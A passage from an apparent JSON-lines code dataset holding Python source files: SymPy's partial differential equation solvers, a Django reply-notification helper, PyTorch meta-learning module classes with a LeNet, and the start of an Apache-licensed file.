8*y/25))\n \"\"\"\n\n # Converting the pde into an equation\n if not isinstance(pde, Equality):\n pde = Eq(pde, 0)\n\n # If no function is given, try finding the function present.\n if func is None:\n try:\n _, func = _preprocess(pde.lhs)\n except ValueError:\n funcs = [s.atoms(AppliedUndef) for s in (\n sol if is_sequence(sol, set) else [sol])]\n funcs = set().union(funcs)\n if len(funcs) != 1:\n raise ValueError(\n 'must pass func arg to checkpdesol for this case.')\n func = funcs.pop()\n\n # If the given solution is in the form of a list or a set\n # then return a list or set of tuples.\n if is_sequence(sol, set):\n return type(sol)([checkpdesol(\n pde, i, func=func,\n solve_for_func=solve_for_func) for i in sol])\n\n # Convert solution into an equation\n if not isinstance(sol, Equality):\n sol = Eq(func, sol)\n elif sol.rhs == func:\n sol = sol.reversed\n\n # Try solving for the function\n solved = sol.lhs == func and not sol.rhs.has(func)\n if solve_for_func and not solved:\n solved = solve(sol, func)\n if solved:\n if len(solved) == 1:\n return checkpdesol(pde, Eq(func, solved[0]),\n func=func, solve_for_func=False)\n else:\n return checkpdesol(pde, [Eq(func, t) for t in solved],\n func=func, solve_for_func=False)\n\n # try direct substitution of the solution into the PDE and simplify\n if sol.lhs == func:\n pde = pde.lhs - pde.rhs\n s = simplify(pde.subs(func, sol.rhs).doit())\n return s is S.Zero, s\n\n raise NotImplementedError(filldedent('''\n Unable to test if %s is a solution to %s.''' % (sol, pde)))\n\n\n\ndef pde_1st_linear_constant_coeff_homogeneous(eq, func, order, match, solvefun):\n r\"\"\"\n Solves a first order linear homogeneous\n partial differential equation with constant coefficients.\n\n The general form of this partial differential equation is\n\n .. math:: a \\frac{\\partial f(x,y)}{\\partial x}\n + b \\frac{\\partial f(x,y)}{\\partial y} + c f(x,y) = 0\n\n where `a`, `b` and `c` are constants.\n\n The general solution is of the form:\n\n .. 
math::\n f(x, y) = F(- a y + b x ) e^{- \\frac{c (a x + b y)}{a^2 + b^2}}\n\n and can be found in SymPy with ``pdsolve``::\n\n >>> from sympy.solvers import pdsolve\n >>> from sympy.abc import x, y, a, b, c\n >>> from sympy import Function, pprint\n >>> f = Function('f')\n >>> u = f(x,y)\n >>> ux = u.diff(x)\n >>> uy = u.diff(y)\n >>> genform = a*ux + b*uy + c*u\n >>> pprint(genform)\n d d\n a*--(f(x, y)) + b*--(f(x, y)) + c*f(x, y)\n dx dy\n\n >>> pprint(pdsolve(genform))\n -c*(a*x + b*y)\n ---------------\n 2 2\n a + b\n f(x, y) = F(-a*y + b*x)*e\n\n Examples\n ========\n\n >>> from sympy import pdsolve\n >>> from sympy import Function, pprint\n >>> from sympy.abc import x,y\n >>> f = Function('f')\n >>> pdsolve(f(x,y) + f(x,y).diff(x) + f(x,y).diff(y))\n Eq(f(x, y), F(x - y)*exp(-x/2 - y/2))\n >>> pprint(pdsolve(f(x,y) + f(x,y).diff(x) + f(x,y).diff(y)))\n x y\n - - - -\n 2 2\n f(x, y) = F(x - y)*e\n\n References\n ==========\n\n - Viktor Grigoryan, \"Partial Differential Equations\"\n Math 124A - Fall 2010, pp.7\n\n \"\"\"\n # TODO : For now homogeneous first order linear PDE's having\n # two variables are implemented. Once there is support for\n # solving systems of ODE's, this can be extended to n variables.\n\n f = func.func\n x = func.args[0]\n y = func.args[1]\n b = match[match['b']]\n c = match[match['c']]\n d = match[match['d']]\n return Eq(f(x,y), exp(-S(d)/(b**2 + c**2)*(b*x + c*y))*solvefun(c*x - b*y))\n\n\ndef pde_1st_linear_constant_coeff(eq, func, order, match, solvefun):\n r\"\"\"\n Solves a first order linear partial differential equation\n with constant coefficients.\n\n The general form of this partial differential equation is\n\n .. math:: a \\frac{\\partial f(x,y)}{\\partial x}\n + b \\frac{\\partial f(x,y)}{\\partial y}\n + c f(x,y) = G(x,y)\n\n where `a`, `b` and `c` are constants and `G(x, y)` can be an arbitrary\n function in `x` and `y`.\n\n The general solution of the PDE is:\n\n .. math::\n f(x, y) = \\left. \\left[F(\\eta) + \\frac{1}{a^2 + b^2}\n \\int\\limits^{a x + b y} G\\left(\\frac{a \\xi + b \\eta}{a^2 + b^2},\n \\frac{- a \\eta + b \\xi}{a^2 + b^2} \\right)\n e^{\\frac{c \\xi}{a^2 + b^2}}\\, d\\xi\\right]\n e^{- \\frac{c \\xi}{a^2 + b^2}}\n \\right|_{\\substack{\\eta=- a y + b x\\\\ \\xi=a x + b y }}\\, ,\n\n where `F(\\eta)` is an arbitrary single-valued function. 
The solution\n can be found in SymPy with ``pdsolve``::\n\n >>> from sympy.solvers import pdsolve\n >>> from sympy.abc import x, y, a, b, c\n >>> from sympy import Function, pprint\n >>> f = Function('f')\n >>> G = Function('G')\n >>> u = f(x,y)\n >>> ux = u.diff(x)\n >>> uy = u.diff(y)\n >>> genform = a*ux + b*uy + c*u - G(x,y)\n >>> pprint(genform)\n d d\n a*--(f(x, y)) + b*--(f(x, y)) + c*f(x, y) - G(x, y)\n dx dy\n >>> pprint(pdsolve(genform, hint='1st_linear_constant_coeff_Integral'))\n // a*x + b*y \\\n || / |\n || | |\n || | c*xi |\n || | ------- |\n || | 2 2 |\n || | /a*xi + b*eta -a*eta + b*xi\\ a + b |\n || | G|------------, -------------|*e d(xi)|\n || | | 2 2 2 2 | |\n || | \\ a + b a + b / |\n || | |\n || / |\n || |\n f(x, y) = ||F(eta) + -------------------------------------------------------|*\n || 2 2 |\n \\\\ a + b /\n <BLANKLINE>\n \\|\n ||\n ||\n ||\n ||\n ||\n ||\n ||\n ||\n -c*xi ||\n -------||\n 2 2||\n a + b ||\n e ||\n ||\n /|eta=-a*y + b*x, xi=a*x + b*y\n\n\n Examples\n ========\n\n >>> from sympy.solvers.pde import pdsolve\n >>> from sympy import Function, pprint, exp\n >>> from sympy.abc import x,y\n >>> f = Function('f')\n >>> eq = -2*f(x,y).diff(x) + 4*f(x,y).diff(y) + 5*f(x,y) - exp(x + 3*y)\n >>> pdsolve(eq)\n Eq(f(x, y), (F(4*x + 2*y)*exp(x/2) + exp(x + 4*y)/15)*exp(-y))\n\n References\n ==========\n\n - Viktor Grigoryan, \"Partial Differential Equations\"\n Math 124A - Fall 2010, pp.7\n\n \"\"\"\n\n # TODO : For now homogeneous first order linear PDE's having\n # two variables are implemented. Once there is support for\n # solving systems of ODE's, this can be extended to n variables.\n xi, eta = symbols(\"xi eta\")\n f = func.func\n x = func.args[0]\n y = func.args[1]\n b = match[match['b']]\n c = match[match['c']]\n d = match[match['d']]\n e = -match[match['e']]\n expterm = exp(-S(d)/(b**2 + c**2)*xi)\n functerm = solvefun(eta)\n solvedict = solve((b*x + c*y - xi, c*x - b*y - eta), x, y)\n # Integral should remain as it is in terms of xi,\n # doit() should be done in _handle_Integral.\n genterm = (1/S(b**2 + c**2))*Integral(\n (1/expterm*e).subs(solvedict), (xi, b*x + c*y))\n return Eq(f(x,y), Subs(expterm*(functerm + genterm),\n (eta, xi), (c*x - b*y, b*x + c*y)))\n\n\ndef pde_1st_linear_variable_coeff(eq, func, order, match, solvefun):\n r\"\"\"\n Solves a first order linear partial differential equation\n with variable coefficients. The general form of this partial\n differential equation is\n\n .. math:: a(x, y) \\frac{\\partial f(x, y)}{\\partial x}\n + b(x, y) \\frac{\\partial f(x, y)}{\\partial y}\n + c(x, y) f(x, y) = G(x, y)\n\n where `a(x, y)`, `b(x, y)`, `c(x, y)` and `G(x, y)` are arbitrary\n functions in `x` and `y`. This PDE is converted into an ODE by\n making the following transformation:\n\n 1. `\\xi` as `x`\n\n 2. `\\eta` as the constant in the solution to the differential\n equation `\\frac{dy}{dx} = -\\frac{b}{a}`\n\n Making the previous substitutions reduces it to the linear ODE\n\n .. 
math:: a(\\xi, \\eta)\\frac{du}{d\\xi} + c(\\xi, \\eta)u - G(\\xi, \\eta) = 0\n\n which can be solved using ``dsolve``.\n\n >>> from sympy.abc import x, y\n >>> from sympy import Function, pprint\n >>> a, b, c, G, f= [Function(i) for i in ['a', 'b', 'c', 'G', 'f']]\n >>> u = f(x,y)\n >>> ux = u.diff(x)\n >>> uy = u.diff(y)\n >>> genform = a(x, y)*u + b(x, y)*ux + c(x, y)*uy - G(x,y)\n >>> pprint(genform)\n d d\n -G(x, y) + a(x, y)*f(x, y) + b(x, y)*--(f(x, y)) + c(x, y)*--(f(x, y))\n dx dy\n\n\n Examples\n ========\n\n >>> from sympy.solvers.pde import pdsolve\n >>> from sympy import Function, pprint\n >>> from sympy.abc import x,y\n >>> f = Function('f')\n >>> eq = x*(u.diff(x)) - y*(u.diff(y)) + y**2*u - y**2\n >>> pdsolve(eq)\n Eq(f(x, y), F(x*y)*exp(y**2/2) + 1)\n\n References\n ==========\n\n - Viktor Grigoryan, \"Partial Differential Equations\"\n Math 124A - Fall 2010, pp.7\n\n \"\"\"\n from sympy.solvers.ode import dsolve\n\n xi, eta = symbols(\"xi eta\")\n f = func.func\n x = func.args[0]\n y = func.args[1]\n b = match[match['b']]\n c = match[match['c']]\n d = match[match['d']]\n e = -match[match['e']]\n\n\n if not d:\n # To deal with cases like b*ux = e or c*uy = e\n if not (b and c):\n if c:\n try:\n tsol = integrate(e/c, y)\n except NotImplementedError:\n raise NotImplementedError(\"Unable to find a solution\"\n \" due to inability of integrate\")\n else:\n return Eq(f(x,y), solvefun(x) + tsol)\n if b:\n try:\n tsol = integrate(e/b, x)\n except NotImplementedError:\n raise NotImplementedError(\"Unable to find a solution\"\n \" due to inability of integrate\")\n else:\n return Eq(f(x,y), solvefun(y) + tsol)\n\n if not c:\n # To deal with cases when c is 0, a simpler method is used.\n # The PDE reduces to b*(u.diff(x)) + d*u = e, which is a linear ODE in x\n plode = f(x).diff(x)*b + d*f(x) - e\n sol = dsolve(plode, f(x))\n syms = sol.free_symbols - plode.free_symbols - {x, y}\n rhs = _simplify_variable_coeff(sol.rhs, syms, solvefun, y)\n return Eq(f(x, y), rhs)\n\n if not b:\n # To deal with cases when b is 0, a simpler method is used.\n # The PDE reduces to c*(u.diff(y)) + d*u = e, which is a linear ODE in y\n plode = f(y).diff(y)*c + d*f(y) - e\n sol = dsolve(plode, f(y))\n syms = sol.free_symbols - plode.free_symbols - {x, y}\n rhs = _simplify_variable_coeff(sol.rhs, syms, solvefun, x)\n return Eq(f(x, y), rhs)\n\n dummy = Function('d')\n h = (c/b).subs(y, dummy(x))\n sol = dsolve(dummy(x).diff(x) - h, dummy(x))\n if isinstance(sol, list):\n sol = sol[0]\n solsym = sol.free_symbols - h.free_symbols - {x, y}\n if len(solsym) == 1:\n solsym = solsym.pop()\n etat = (solve(sol, solsym)[0]).subs(dummy(x), y)\n ysub = solve(eta - etat, y)[0]\n deq = (b*(f(x).diff(x)) + d*f(x) - e).subs(y, ysub)\n final = (dsolve(deq, f(x), hint='1st_linear')).rhs\n if isinstance(final, list):\n final = final[0]\n finsyms = final.free_symbols - deq.free_symbols - {x, y}\n rhs = _simplify_variable_coeff(final, finsyms, solvefun, etat)\n return Eq(f(x, y), rhs)\n\n else:\n raise NotImplementedError(\"Cannot solve the partial differential equation due\"\n \" to inability of constantsimp\")\n\n\ndef _simplify_variable_coeff(sol, syms, func, funcarg):\n r\"\"\"\n Helper function to replace constants by functions in 1st_linear_variable_coeff\n \"\"\"\n eta = Symbol(\"eta\")\n if len(syms) == 1:\n sym = syms.pop()\n final = sol.subs(sym, func(funcarg))\n\n else:\n for key, sym in enumerate(syms):\n final = sol.subs(sym, func(funcarg))\n\n return simplify(final.subs(eta, funcarg))\n\n\ndef pde_separate(eq, 
fun, sep, strategy='mul'):\n \"\"\"Separate variables in partial differential equation either by additive\n or multiplicative separation approach. It tries to rewrite an equation so\n that one of the specified variables occurs on a different side of the\n equation than the others.\n\n :param eq: Partial differential equation\n\n :param fun: Original function F(x, y, z)\n\n :param sep: List of separated functions [X(x), u(y, z)]\n\n :param strategy: Separation strategy. You can choose between additive\n separation ('add') and multiplicative separation ('mul') which is\n default.\n\n Examples\n ========\n\n >>> from sympy import E, Eq, Function, pde_separate, Derivative as D\n >>> from sympy.abc import x, t\n >>> u, X, T = map(Function, 'uXT')\n\n >>> eq = Eq(D(u(x, t), x), E**(u(x, t))*D(u(x, t), t))\n >>> pde_separate(eq, u(x, t), [X(x), T(t)], strategy='add')\n [exp(-X(x))*Derivative(X(x), x), exp(T(t))*Derivative(T(t), t)]\n\n >>> eq = Eq(D(u(x, t), x, 2), D(u(x, t), t, 2))\n >>> pde_separate(eq, u(x, t), [X(x), T(t)], strategy='mul')\n [Derivative(X(x), (x, 2))/X(x), Derivative(T(t), (t, 2))/T(t)]\n\n See Also\n ========\n pde_separate_add, pde_separate_mul\n \"\"\"\n\n do_add = False\n if strategy == 'add':\n do_add = True\n elif strategy == 'mul':\n do_add = False\n else:\n raise ValueError('Unknown strategy: %s' % strategy)\n\n if isinstance(eq, Equality):\n if eq.rhs != 0:\n return pde_separate(Eq(eq.lhs - eq.rhs, 0), fun, sep, strategy)\n else:\n return pde_separate(Eq(eq, 0), fun, sep, strategy)\n\n if eq.rhs != 0:\n raise ValueError(\"Value should be 0\")\n\n # Handle arguments\n orig_args = list(fun.args)\n subs_args = []\n for s in sep:\n for j in range(0, len(s.args)):\n subs_args.append(s.args[j])\n\n if do_add:\n functions = reduce(operator.add, sep)\n else:\n functions = reduce(operator.mul, sep)\n\n # Check whether variables match\n if len(subs_args) != len(orig_args):\n raise ValueError(\"Variable counts do not match\")\n # Check for duplicate arguments like [X(x), u(x, y)]\n if has_dups(subs_args):\n raise ValueError(\"Duplicate substitution arguments detected\")\n # Check whether the variables match\n if set(orig_args) != set(subs_args):\n raise ValueError(\"Arguments do not match\")\n\n # Substitute original function with separated...\n result = eq.lhs.subs(fun, functions).doit()\n\n # Divide by terms when doing multiplicative separation\n if not do_add:\n eq = 0\n for i in result.args:\n eq += i/functions\n result = eq\n\n svar = subs_args[0]\n dvar = subs_args[1:]\n return _separate(result, svar, dvar)\n\n\ndef pde_separate_add(eq, fun, sep):\n \"\"\"\n Helper function for searching additive separable solutions.\n\n Consider an equation of two independent variables x, y and a dependent\n variable w, we look for the product of two functions depending on different\n arguments:\n\n `w(x, y, z) = X(x) + y(y, z)`\n\n Examples\n ========\n\n >>> from sympy import E, Eq, Function, pde_separate_add, Derivative as D\n >>> from sympy.abc import x, t\n >>> u, X, T = map(Function, 'uXT')\n\n >>> eq = Eq(D(u(x, t), x), E**(u(x, t))*D(u(x, t), t))\n >>> pde_separate_add(eq, u(x, t), [X(x), T(t)])\n [exp(-X(x))*Derivative(X(x), x), exp(T(t))*Derivative(T(t), t)]\n\n \"\"\"\n return pde_separate(eq, fun, sep, strategy='add')\n\n\ndef pde_separate_mul(eq, fun, sep):\n \"\"\"\n Helper function for searching multiplicative separable solutions.\n\n Consider an equation of two independent variables x, y and a dependent\n variable w, we look for the product of two functions depending on 
different\n arguments:\n\n `w(x, y, z) = X(x)*u(y, z)`\n\n Examples\n ========\n\n >>> from sympy import Function, Eq, pde_separate_mul, Derivative as D\n >>> from sympy.abc import x, y\n >>> u, X, Y = map(Function, 'uXY')\n\n >>> eq = Eq(D(u(x, y), x, 2), D(u(x, y), y, 2))\n >>> pde_separate_mul(eq, u(x, y), [X(x), Y(y)])\n [Derivative(X(x), (x, 2))/X(x), Derivative(Y(y), (y, 2))/Y(y)]\n\n \"\"\"\n return pde_separate(eq, fun, sep, strategy='mul')\n\n\ndef _separate(eq, dep, others):\n \"\"\"Separate expression into two parts based on dependencies of variables.\"\"\"\n\n # FIRST PASS\n # Extract derivatives depending our separable variable...\n terms = set()\n for term in eq.args:\n if term.is_Mul:\n for i in term.args:\n if i.is_Derivative and not i.has(*others):\n terms.add(term)\n continue\n elif term.is_Derivative and not term.has(*others):\n terms.add(term)\n # Find the factor that we need to divide by\n div = set()\n for term in terms:\n ext, sep = term.expand().as_independent(dep)\n # Failed?\n if sep.has(*others):\n return None\n div.add(ext)\n # FIXME: Find lcm() of all the divisors and divide with it, instead of\n # current hack :(\n # https://github.com/sympy/sympy/issues/4597\n if len(div) > 0:\n final = 0\n for term in eq.args:\n eqn = 0\n for i in div:\n eqn += term / i\n final += simplify(eqn)\n eq = final\n\n # SECOND PASS - separate the derivatives\n div = set()\n lhs = rhs = 0\n for term in eq.args:\n # Check, whether we have already term with independent variable...\n if not term.has(*others):\n lhs += term\n continue\n # ...otherwise, try to separate\n temp, sep = term.expand().as_independent(dep)\n # Failed?\n if sep.has(*others):\n return None\n # Extract the divisors\n div.add(sep)\n rhs -= term.expand()\n # Do the division\n fulldiv = reduce(operator.add, div)\n lhs = simplify(lhs/fulldiv).expand()\n rhs = simplify(rhs/fulldiv).expand()\n # ...and check whether we were successful :)\n if lhs.has(*others) or rhs.has(dep):\n return None\n return [lhs, rhs]\n"} {"ext": "py", "sha": "1a310bca53a1b5e608a90067a9814f4172b33a1f", "content": "from notifications.signals import notify\n\ndef notify_answer(request, topico, resposta):\n recipient = resposta.parent.user if resposta.parent else topico.user\n verb = 'responder'\n description = f'{recipient} respondeu seu post em {topico.titulo}.'\n url = topico.get_absolute_url() + f'#post{resposta.pk}'\n\n if request.user.pk != recipient.pk:\n notify.send(sender=request.user, recipient=recipient, target=topico, \n action_object=resposta, verb=verb, description=description, url=url)"} {"ext": "py", "sha": "1a310c17812bdb0293f2b1dbb41749e21abbc495", "content": "import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport numpy as np\nimport torchvision\nfrom torch.autograd import Variable\nimport itertools\nimport operator\nfrom itertools import islice\nfrom collections import OrderedDict\n\ndef to_var(x, requires_grad=True):\n if torch.cuda.is_available():\n x = x.cuda()\n return Variable(x, requires_grad=requires_grad)\n\nclass MetaModule(nn.Module):\n # adopted from: Adrien Ecoffet https://github.com/AdrienLE\n def parameters(self):\n for name, param in self.named_params(self):\n yield param\n\n def named_parameters(self):\n for name, param in self.named_params(self):\n yield name, param\n \n def named_leaves(self):\n return []\n \n def named_submodules(self):\n return []\n \n def named_params(self, curr_module=None, memo=None, prefix=''): \n if memo is None:\n memo = set()\n\n if hasattr(curr_module, 
'named_leaves'):\n for name, p in curr_module.named_leaves():\n if p is not None and p not in memo:\n memo.add(p)\n yield prefix + ('.' if prefix else '') + name, p\n else:\n for name, p in curr_module._parameters.items():\n if p is not None and p not in memo:\n memo.add(p)\n yield prefix + ('.' if prefix else '') + name, p\n \n for mname, module in curr_module.named_children():\n submodule_prefix = prefix + ('.' if prefix else '') + mname\n for name, p in self.named_params(module, memo, submodule_prefix):\n yield name, p\n \n def update_params(self, lr_inner, first_order=False, source_params=None, detach=False):\n if source_params is not None:\n for tgt, src in zip(self.named_params(self), source_params):\n name_t, param_t = tgt\n # name_s, param_s = src\n # grad = param_s.grad\n # name_s, param_s = src\n grad = src\n if first_order:\n grad = to_var(grad.detach().data)\n tmp = param_t - lr_inner * grad\n self.set_param(self, name_t, tmp)\n else:\n for name, param in self.named_params(self):\n if not detach:\n grad = param.grad\n if first_order:\n grad = to_var(grad.detach().data)\n tmp = param - lr_inner * grad\n self.set_param(self, name, tmp)\n else:\n param = param.detach_()\n self.set_param(self, name, param)\n\n def set_param(self,curr_mod, name, param):\n if '.' in name:\n n = name.split('.')\n module_name = n[0]\n rest = '.'.join(n[1:])\n for name, mod in curr_mod.named_children():\n if module_name == name:\n self.set_param(mod, rest, param)\n break\n else:\n setattr(curr_mod, name, param)\n \n def detach_params(self):\n for name, param in self.named_params(self):\n self.set_param(self, name, param.detach()) \n \n def copy(self, other, same_var=False):\n for name, param in other.named_params():\n if not same_var:\n param = to_var(param.data.clone(), requires_grad=True)\n self.set_param(name, param)\n\n\nclass MetaLinear(MetaModule):\n def __init__(self, *args, **kwargs):\n super().__init__()\n ignore = nn.Linear(*args, **kwargs)\n \n self.register_buffer('weight', to_var(ignore.weight.data, requires_grad=True))\n self.register_buffer('bias', to_var(ignore.bias.data, requires_grad=True))\n self.in_features = ignore.weight.size(1)\n self.out_features = ignore.weight.size(0)\n \n def forward(self, x):\n return F.linear(x, self.weight, self.bias)\n \n def named_leaves(self):\n return [('weight', self.weight), ('bias', self.bias)]\n \n\n\n\n\nclass MetaSequential(MetaModule):\n r\"\"\"A sequential container.\n Modules will be added to it in the order they are passed in the constructor.\n Alternatively, an ordered dict of modules can also be passed in.\n\n To make it easier to understand, here is a small example::\n\n # Example of using Sequential\n model = MetaSequential(\n MetaConv2d(1,20,5),\n nn.ReLU(),\n MetaConv2d(20,64,5),\n nn.ReLU()\n )\n\n # Example of using Sequential with OrderedDict\n model = MetaSequential(OrderedDict([\n ('conv1', MetaConv2d(1,20,5)),\n ('relu1', nn.ReLU()),\n ('conv2', MetaConv2d(20,64,5)),\n ('relu2', nn.ReLU())\n ]))\n \"\"\"\n\n def __init__(self, *args):\n super(MetaSequential, self).__init__()\n if len(args) == 1 and isinstance(args[0], OrderedDict):\n for key, module in args[0].items():\n self.add_module(key, module)\n else:\n for idx, module in enumerate(args):\n self.add_module(str(idx), module)\n\n def _get_item_by_idx(self, iterator, idx):\n \"\"\"Get the idx-th item of the iterator\"\"\"\n size = len(self)\n idx = operator.index(idx)\n if not -size <= idx < size:\n raise IndexError('index {} is out of range'.format(idx))\n idx %= size\n return 
next(islice(iterator, idx, None))\n\n def __getitem__(self, idx):\n if isinstance(idx, slice):\n return self.__class__(OrderedDict(list(self._modules.items())[idx]))\n else:\n return self._get_item_by_idx(self._modules.values(), idx)\n\n def __setitem__(self, idx, module):\n key = self._get_item_by_idx(self._modules.keys(), idx)\n return setattr(self, key, module)\n\n def __delitem__(self, idx):\n if isinstance(idx, slice):\n for key in list(self._modules.keys())[idx]:\n delattr(self, key)\n else:\n key = self._get_item_by_idx(self._modules.keys(), idx)\n delattr(self, key)\n\n def __len__(self):\n return len(self._modules)\n\n def __dir__(self):\n keys = super(Sequential, self).__dir__()\n keys = [key for key in keys if not key.isdigit()]\n return keys\n\n def forward(self, input):\n for module in self._modules.values():\n input = module(input)\n return input\n\n\nclass MetaModuleList(MetaModule):\n r\"\"\"Holds submodules in a list.\n\n :class:`~MetaModuleList` can be indexed like a regular Python list, but\n modules it contains are properly registered, and will be visible by all\n :class:`~MetaModule` methods.\n\n Arguments:\n modules (iterable, optional): an iterable of modules to add\n\n Example::\n\n class MyModule(MetaModule):\n def __init__(self):\n super(MyModule, self).__init__()\n self.linears = MetaModuleList([MetaLinear(10, 10) for i in range(10)])\n\n def forward(self, x):\n # ModuleList can act as an iterable, or be indexed using ints\n for i, l in enumerate(self.linears):\n x = self.linears[i // 2](x) + l(x)\n return x\n \"\"\"\n\n def __init__(self, modules=None):\n super(MetaModuleList, self).__init__()\n if modules is not None:\n self += modules\n\n def _get_abs_string_index(self, idx):\n \"\"\"Get the absolute index for the list of modules\"\"\"\n idx = operator.index(idx)\n if not (-len(self) <= idx < len(self)):\n raise IndexError('index {} is out of range'.format(idx))\n if idx < 0:\n idx += len(self)\n return str(idx)\n\n def __getitem__(self, idx):\n if isinstance(idx, slice):\n return self.__class__(list(self._modules.values())[idx])\n else:\n return self._modules[self._get_abs_string_index(idx)]\n\n def __setitem__(self, idx, module):\n idx = self._get_abs_string_index(idx)\n return setattr(self, str(idx), module)\n\n def __delitem__(self, idx):\n if isinstance(idx, slice):\n for k in range(len(self._modules))[idx]:\n delattr(self, str(k))\n else:\n delattr(self, self._get_abs_string_index(idx))\n # To preserve numbering, self._modules is being reconstructed with modules after deletion\n str_indices = [str(i) for i in range(len(self._modules))]\n self._modules = OrderedDict(list(zip(str_indices, self._modules.values())))\n\n def __len__(self):\n return len(self._modules)\n\n def __iter__(self):\n return iter(self._modules.values())\n\n def __iadd__(self, modules):\n return self.extend(modules)\n\n def __dir__(self):\n keys = super(ModuleList, self).__dir__()\n keys = [key for key in keys if not key.isdigit()]\n return keys\n\n def insert(self, index, module):\n r\"\"\"Insert a given module before a given index in the list.\n\n Arguments:\n index (int): index to insert.\n module (MetaModule): module to insert\n \"\"\"\n for i in range(len(self._modules), index, -1):\n self._modules[str(i)] = self._modules[str(i - 1)]\n self._modules[str(index)] = module\n\n\n def append(self, module):\n r\"\"\"Appends a given module to the end of the list.\n\n Arguments:\n module (MetaModule): module to append\n \"\"\"\n self.add_module(str(len(self)), module)\n return self\n\n\n 
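    # NOTE: ``extend`` below (and ``ModuleDict.update`` further down) checks
    # its argument against ``container_abcs``, which this module never
    # imports.  One version-tolerant way to provide it, placed with the
    # top-level imports (a sketch, not part of the original code):
    #
    #     try:
    #         from torch._six import container_abcs   # older torch releases
    #     except ImportError:
    #         import collections.abc as container_abcs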
def extend(self, modules):\n r\"\"\"Appends modules from a Python iterable to the end of the list.\n\n Arguments:\n modules (iterable): iterable of modules to append\n \"\"\"\n if not isinstance(modules, container_abcs.Iterable):\n raise TypeError(\"ModuleList.extend should be called with an \"\n \"iterable, but got \" + type(modules).__name__)\n offset = len(self)\n for i, module in enumerate(modules):\n self.add_module(str(offset + i), module)\n return self\n\n\n\nclass ModuleDict(MetaModule):\n r\"\"\"Holds submodules in a dictionary.\n\n :class:`~MetaModuleDict` can be indexed like a regular Python dictionary,\n but modules it contains are properly registered, and will be visible by all\n :class:`~MetaModule` methods.\n\n :class:`~MetaModuleDict` is an **ordered** dictionary that respects\n\n * the order of insertion, and\n\n * in :meth:`~MetaModuleDict.update`, the order of the merged ``OrderedDict``\n or another :class:`~MetaModuleDict` (the argument to :meth:`~MetaModuleDict.update`).\n\n Note that :meth:`~MetaModuleDict.update` with other unordered mapping\n types (e.g., Python's plain ``dict``) does not preserve the order of the\n merged mapping.\n\n Arguments:\n modules (iterable, optional): a mapping (dictionary) of (string: module)\n or an iterable of key-value pairs of type (string, module)\n\n Example::\n\n class MyModule(MetaModule):\n def __init__(self):\n super(MyModule, self).__init__()\n self.choices = MetaModuleDict({\n 'conv': MetaConv2d(10, 10, 3),\n 'pool': nn.MaxPool2d(3)\n })\n self.activations = MetaModuleDict([\n ['lrelu', nn.LeakyReLU()],\n ['prelu', nn.PReLU()]\n ])\n\n def forward(self, x, choice, act):\n x = self.choices[choice](x)\n x = self.activations[act](x)\n return x\n \"\"\"\n\n def __init__(self, modules=None):\n super(MetaModuleDict, self).__init__()\n if modules is not None:\n self.update(modules)\n\n def __getitem__(self, key):\n return self._modules[key]\n\n def __setitem__(self, key, module):\n self.add_module(key, module)\n\n def __delitem__(self, key):\n del self._modules[key]\n\n def __len__(self):\n return len(self._modules)\n\n def __iter__(self):\n return iter(self._modules)\n\n def __contains__(self, key):\n return key in self._modules\n\n def clear(self):\n \"\"\"Remove all items from the ModuleDict.\n \"\"\"\n self._modules.clear()\n\n\n def pop(self, key):\n r\"\"\"Remove key from the ModuleDict and return its module.\n\n Arguments:\n key (string): key to pop from the ModuleDict\n \"\"\"\n v = self[key]\n del self[key]\n return v\n\n\n def keys(self):\n r\"\"\"Return an iterable of the ModuleDict keys.\n \"\"\"\n return self._modules.keys()\n\n\n def items(self):\n r\"\"\"Return an iterable of the ModuleDict key/value pairs.\n \"\"\"\n return self._modules.items()\n\n\n def values(self):\n r\"\"\"Return an iterable of the ModuleDict values.\n \"\"\"\n return self._modules.values()\n\n\n def update(self, modules):\n r\"\"\"Update the :class:`~MetaModuleDict` with the key-value pairs from a\n mapping or an iterable, overwriting existing keys.\n\n .. 
note::\n If :attr:`modules` is an ``OrderedDict``, a :class:`~MetaModuleDict`, or\n an iterable of key-value pairs, the order of new elements in it is preserved.\n\n Arguments:\n modules (iterable): a mapping (dictionary) from string to :class:`~MetaModule`,\n or an iterable of key-value pairs of type (string, :class:`~MetaModule`)\n \n \"\"\"\n if not isinstance(modules, container_abcs.Iterable):\n raise TypeError(\"ModuleDict.update should be called with an \"\n \"iterable of key/value pairs, but got \" +\n type(modules).__name__)\n\n if isinstance(modules, container_abcs.Mapping):\n if isinstance(modules, (OrderedDict, ModuleDict)):\n for key, module in modules.items():\n self[key] = module\n else:\n for key, module in sorted(modules.items()):\n self[key] = module\n else:\n for j, m in enumerate(modules):\n if not isinstance(m, container_abcs.Iterable):\n raise TypeError(\"ModuleDict update sequence element \"\n \"#\" + str(j) + \" should be Iterable; is\" +\n type(m).__name__)\n if not len(m) == 2:\n raise ValueError(\"ModuleDict update sequence element \"\n \"#\" + str(j) + \" has length \" + str(len(m)) +\n \"; 2 is required\")\n self[m[0]] = m[1]\n\n def forward(self):\n raise NotImplementedError()\n\n\n\nclass LeNet(MetaModule):\n def __init__(self, n_out):\n super(LeNet, self).__init__()\n \n layers = []\n layers.append(MetaConv2d(1, 6, kernel_size=5))\n layers.append(nn.ReLU(inplace=True))\n layers.append(nn.MaxPool2d(kernel_size=2,stride=2))\n\n layers.append(MetaConv2d(6, 16, kernel_size=5))\n layers.append(nn.ReLU(inplace=True))\n layers.append(nn.MaxPool2d(kernel_size=2,stride=2))\n \n layers.append(MetaConv2d(16, 120, kernel_size=5))\n layers.append(nn.ReLU(inplace=True))\n \n self.main = nn.Sequential(*layers)\n \n layers = []\n layers.append(MetaLinear(120, 84))\n layers.append(nn.ReLU(inplace=True))\n layers.append(MetaLinear(84, n_out))\n \n self.fc_layers = nn.Sequential(*layers)\n \n def forward(self, x):\n x = self.main(x)\n x = x.view(-1, 120)\n return self.fc_layers(x).squeeze()\n"} {"ext": "py", "sha": "1a310d07ee210eb8ddec1a5bbd788d533dde86d5", "content": "#!/usr/bin/env python\n# Software License Agreement (Apache License 2.0)\n#\n# Copyright 2017 Florian Kromer\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the 